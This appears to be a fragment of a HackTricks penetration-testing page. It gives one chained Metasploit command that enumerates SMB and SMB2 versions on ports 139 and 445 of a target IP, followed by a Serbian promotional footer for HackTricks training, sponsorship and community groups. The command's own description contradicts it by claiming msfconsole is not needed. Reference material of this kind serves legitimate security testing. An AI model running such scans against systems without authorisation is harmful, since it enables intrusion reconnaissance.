Description: SMB/SMB2 139/445  enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'

```
<details>

<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Drugi načini podrške HackTricks-u:

* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.

</details>